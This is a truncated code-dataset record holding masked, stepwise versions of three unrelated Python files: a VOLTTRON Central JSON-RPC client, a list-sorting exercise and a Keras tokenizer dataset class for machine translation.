:param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance', discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-5": "# -*- coding: utf-8 -*- {{{\n# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:\n\n# Copyright (c) 2017, Battelle Memorial Institute\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation\n# are those of the authors and should not be interpreted as representing\n# official policies, either expressed or implied, of the FreeBSD\n# Project.\n#\n# This material was prepared as an account of work sponsored by an\n# agency of the United States Government. Neither the United States\n# Government nor the United States Department of Energy, nor Battelle,\n# nor any of their employees, nor any jurisdiction or organization that\n# has cooperated in the development of these materials, makes any\n# warranty, express or implied, or assumes any legal liability or\n# responsibility for the accuracy, completeness, or usefulness or any\n# information, apparatus, product, software, or process disclosed, or\n# represents that its use would not infringe privately owned rights.\n#\n# Reference herein to any specific commercial product, process, or\n# service by trade name, trademark, manufacturer, or otherwise does not\n# necessarily constitute or imply its endorsement, recommendation, or\n# favoring by the United States Government or any agency thereof, or\n# Battelle Memorial Institute. The views and opinions of authors\n# expressed herein do not necessarily state or reflect those of the\n# United States Government or any agency thereof.\n#\n# PACIFIC NORTHWEST NATIONAL LABORATORY\n# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY\n# under Contract DE-AC05-76RL01830\n\n# }}}\n\nimport requests\n\n\"\"\"\nThis example exposes the VOLTTRON web API\nthrough a python class that that does not depend\non VOLTTRON proper. A VOLTTRON Central Agent must\nbe running on the url passed to the constructor.\n\"\"\"\n\nclass VolttronWebRPC(object):\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {\n 'jsonrpc': '2.0',\n 'method': method,\n 'params': params,\n 'authorization': self._auth_token,\n 'id': '1'\n }\n\n r = requests.post(self._url, json=data)\n validate_response(r)\n\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization',\n username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance',discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type=\"json\"):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw_contents=raw_contents,\n config_type=config_type)\n return self.do_rpc(\"store_agent_config\", **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity)\n return self.do_rpc(\"list_agent_configs\", **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw=raw)\n return self.do_rpc(\"get_agent_config\", **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc(\"set_setting\", key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc(\"get_setting\", key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc(\"get_setting_keys\")\n\n\ndef validate_response(response):\n \"\"\"\n Validate that the message is a json-rpc response.\n\n :param response:\n :return:\n \"\"\"\n assert response.ok\n rpcdict = response.json()\n assert rpcdict['jsonrpc'] == '2.0'\n assert rpcdict['id']\n assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()\n",
"step-ids": [
11,
12,
14,
15,
18
]
}
|
[
11,
12,
14,
15,
18
] |
#Sorting for a number list
#ascending and descending
ls=[1,34,23,56,34,67,87,54,62,31,66]
ls.sort(reverse=True)
print(ls)
ls.sort()
print(ls)
#Sorting a letter's list with different scenarios
ls_l=["aaa","ertdf","ieurtff","fnjr","resdjx","jfh","r","fd"]
#1-sort according to string length from small length to bigger
ls_l.sort(key=len)
print(ls_l)
#you can always reverse
ls_l.sort(key=len,reverse=True)
print(ls_l)
#2-Sort with first alphabetical order
def FirstLetter(string):
return string[0]
ls_l.sort(key=FirstLetter)
print(ls_l)
ls2=[[0,1,'f'],[4,2,'t'],[9,4,'afsd']]
def secondItem(ls):
return ls[2]
ls2.sort(key=secondItem)
print(ls2)
|
normal
|
{
"blob_id": "0e0e51904f05b41b4769b730c836568b8bb63869",
"index": 9564,
"step-1": "<mask token>\n\n\ndef secondItem(ls):\n return ls[2]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef FirstLetter(string):\n return string[0]\n\n\n<mask token>\n\n\ndef secondItem(ls):\n return ls[2]\n\n\n<mask token>\n",
"step-3": "<mask token>\nls.sort(reverse=True)\nprint(ls)\nls.sort()\nprint(ls)\n<mask token>\nls_l.sort(key=len)\nprint(ls_l)\nls_l.sort(key=len, reverse=True)\nprint(ls_l)\n\n\ndef FirstLetter(string):\n return string[0]\n\n\nls_l.sort(key=FirstLetter)\nprint(ls_l)\n<mask token>\n\n\ndef secondItem(ls):\n return ls[2]\n\n\nls2.sort(key=secondItem)\nprint(ls2)\n",
"step-4": "ls = [1, 34, 23, 56, 34, 67, 87, 54, 62, 31, 66]\nls.sort(reverse=True)\nprint(ls)\nls.sort()\nprint(ls)\nls_l = ['aaa', 'ertdf', 'ieurtff', 'fnjr', 'resdjx', 'jfh', 'r', 'fd']\nls_l.sort(key=len)\nprint(ls_l)\nls_l.sort(key=len, reverse=True)\nprint(ls_l)\n\n\ndef FirstLetter(string):\n return string[0]\n\n\nls_l.sort(key=FirstLetter)\nprint(ls_l)\nls2 = [[0, 1, 'f'], [4, 2, 't'], [9, 4, 'afsd']]\n\n\ndef secondItem(ls):\n return ls[2]\n\n\nls2.sort(key=secondItem)\nprint(ls2)\n",
"step-5": "#Sorting for a number list\n#ascending and descending\nls=[1,34,23,56,34,67,87,54,62,31,66]\nls.sort(reverse=True)\nprint(ls)\nls.sort()\nprint(ls)\n#Sorting a letter's list with different scenarios\nls_l=[\"aaa\",\"ertdf\",\"ieurtff\",\"fnjr\",\"resdjx\",\"jfh\",\"r\",\"fd\"]\n\n#1-sort according to string length from small length to bigger\nls_l.sort(key=len)\nprint(ls_l)\n\n#you can always reverse\nls_l.sort(key=len,reverse=True)\nprint(ls_l)\n\n#2-Sort with first alphabetical order\ndef FirstLetter(string):\n return string[0]\n\nls_l.sort(key=FirstLetter)\nprint(ls_l)\n\n\n\n\n\nls2=[[0,1,'f'],[4,2,'t'],[9,4,'afsd']]\ndef secondItem(ls):\n return ls[2]\nls2.sort(key=secondItem)\nprint(ls2)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from collections import defaultdict
from typing import Union, Iterable, Sized
import numpy as np
from cached_property import cached_property
from keras.utils import to_categorical
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer, text_to_word_sequence
class SourceTargetMixin:
"""
Allows subscription with 'source' and 'target' keywords
"""
def __getitem__(self, item):
if item in ['source', 'target']:
return getattr(self, item)
raise TypeError('Subscription is available '
'only with "source" and "target" keywords')
class BaseDataset(SourceTargetMixin):
def __init__(self, source: Union[Iterable, Sized],
target: Union[Iterable, Sized],
shuffle: bool=True, seed: int=42):
self.source = source
self.target = target
self._validate()
if shuffle:
self.shuffle(seed)
def _validate(self) -> None:
src_len = len(self.source)
target_len = len(self.target)
if src_len != target_len:
raise TypeError('Number of source rows ({}) does not match '
'the number of target rows ({})'.format(src_len,
target_len))
def shuffle(self, seed: int=42) -> None:
np.random.seed(seed)
shuffled_indexes = np.random.permutation(len(self.source))
self.source = self.source[shuffled_indexes]
self.target = self.target[shuffled_indexes]
class TokenizerPair(SourceTargetMixin):
def __init__(self, tokenizer_class=Tokenizer):
self.source = tokenizer_class()
self.target = tokenizer_class()
@property
def is_tokenized(self) -> bool:
return hasattr(self.source, 'word_index') \
and hasattr(self.target, 'word_index')
@cached_property
def target_index_word(self):
return {v: k for k, v in self.target.word_index.items()}
class TextDataset(BaseDataset):
def __init__(self, source_sentences: Union[Iterable, Sized],
target_sentences: Union[Iterable, Sized],
shuffle: bool=True, word_frequency_threshold: int=2):
super().__init__(source_sentences, target_sentences, shuffle)
self.word_frequency_threshold = word_frequency_threshold
self.tokenizer_pair = TokenizerPair()
@cached_property
def translation_references(self):
references = defaultdict(list)
for idx, sentence in enumerate(self.source):
split_sentence = text_to_word_sequence(self.target[idx])
references[sentence].append(split_sentence)
return references
@property
def source_max_sentence_length(self) -> int:
return self.max_sentence_length('source')
@property
def target_max_sentence_length(self) -> int:
return self.max_sentence_length('target')
@property
def source_vocab_size(self) -> int:
return self.tokenizer_pair.source.num_words
@property
def target_vocab_size(self) -> int:
return self.tokenizer_pair.target.num_words
def get_vocab_size(self, level: str) -> int:
if not self.tokenizer_pair.is_tokenized:
raise ValueError('Dataset has not been tokenized yet')
return len(self.tokenizer_pair[level].word_index) + 1
def max_sentence_length(self, level: str) -> int:
return max(len(line.split()) for line in self[level])
def tokenize(self) -> None:
if not self.tokenizer_pair.is_tokenized:
self.tokenizer_pair['source'].fit_on_texts(self.source)
self.tokenizer_pair['target'].fit_on_texts(self.target)
# limit number of words returned from tokenizer
# according to frequency threshold
self.tokenizer_pair['source'].num_words = len(
[word for word, count
in self.tokenizer_pair['source'].word_counts.items()
if count > self.word_frequency_threshold - 1]
)
self.tokenizer_pair['target'].num_words = len(
[word for word, count
in self.tokenizer_pair['target'].word_counts.items()
if count > self.word_frequency_threshold - 1]
)
def get_sequences(self, level: str) -> np.ndarray:
if not self.tokenizer_pair.is_tokenized:
self.tokenize()
sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])
return pad_sequences(
sentences, maxlen=self.max_sentence_length(level), padding='post'
)
def encode_output(self, sequences: np.array) -> np.array:
return to_categorical(sequences, self.target_vocab_size)
def sequence_to_sentence(self, sequence: Iterable) -> str:
target_sentence = [
self.tokenizer_pair.target_index_word.get(word_index, '')
for word_index in sequence
]
return ' '.join(target_sentence)
def sentence_to_sequence(self, sentence: str) -> np.ndarray:
return pad_sequences(
self.tokenizer_pair['source'].texts_to_sequences([sentence]),
self.max_sentence_length('source'), padding='post'
)
|
normal
|
{
"blob_id": "e5d7cc65041d65f915d4882b4fdad5bebf79a067",
"index": 204,
"step-1": "<mask token>\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n <mask token>\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n <mask token>\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
"step-2": "<mask token>\n\n\nclass BaseDataset(SourceTargetMixin):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TokenizerPair(SourceTargetMixin):\n\n def __init__(self, tokenizer_class=Tokenizer):\n self.source = tokenizer_class()\n self.target = tokenizer_class()\n\n @property\n def is_tokenized(self) ->bool:\n return hasattr(self.source, 'word_index') and hasattr(self.target,\n 'word_index')\n\n @cached_property\n def target_index_word(self):\n return {v: k for k, v in self.target.word_index.items()}\n\n\nclass TextDataset(BaseDataset):\n\n def __init__(self, source_sentences: Union[Iterable, Sized],\n target_sentences: Union[Iterable, Sized], shuffle: bool=True,\n word_frequency_threshold: int=2):\n super().__init__(source_sentences, target_sentences, shuffle)\n self.word_frequency_threshold = word_frequency_threshold\n self.tokenizer_pair = TokenizerPair()\n\n @cached_property\n def translation_references(self):\n references = defaultdict(list)\n for idx, sentence in enumerate(self.source):\n split_sentence = text_to_word_sequence(self.target[idx])\n references[sentence].append(split_sentence)\n return references\n\n @property\n def source_max_sentence_length(self) ->int:\n return self.max_sentence_length('source')\n\n @property\n def target_max_sentence_length(self) ->int:\n return self.max_sentence_length('target')\n\n @property\n def source_vocab_size(self) ->int:\n return self.tokenizer_pair.source.num_words\n\n @property\n def target_vocab_size(self) ->int:\n return self.tokenizer_pair.target.num_words\n\n def get_vocab_size(self, level: str) ->int:\n if not self.tokenizer_pair.is_tokenized:\n raise ValueError('Dataset has not been tokenized yet')\n return len(self.tokenizer_pair[level].word_index) + 1\n\n def max_sentence_length(self, level: str) ->int:\n return max(len(line.split()) for line in self[level])\n\n def tokenize(self) ->None:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenizer_pair['source'].fit_on_texts(self.source)\n self.tokenizer_pair['target'].fit_on_texts(self.target)\n self.tokenizer_pair['source'].num_words = len([word for word,\n count in self.tokenizer_pair['source'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n self.tokenizer_pair['target'].num_words = len([word for word,\n count in self.tokenizer_pair['target'].word_counts.items() if\n count > self.word_frequency_threshold - 1])\n\n def get_sequences(self, level: str) ->np.ndarray:\n if not self.tokenizer_pair.is_tokenized:\n self.tokenize()\n sentences = self.tokenizer_pair[level].texts_to_sequences(self[level])\n return pad_sequences(sentences, maxlen=self.max_sentence_length(\n level), padding='post')\n\n def encode_output(self, sequences: np.array) ->np.array:\n return to_categorical(sequences, self.target_vocab_size)\n\n def sequence_to_sentence(self, sequence: Iterable) ->str:\n target_sentence = [self.tokenizer_pair.target_index_word.get(\n word_index, '') for word_index in sequence]\n return ' '.join(target_sentence)\n\n def sentence_to_sequence(self, sentence: str) ->np.ndarray:\n return pad_sequences(self.tokenizer_pair['source'].\n texts_to_sequences([sentence]), self.max_sentence_length(\n 'source'), padding='post')\n",
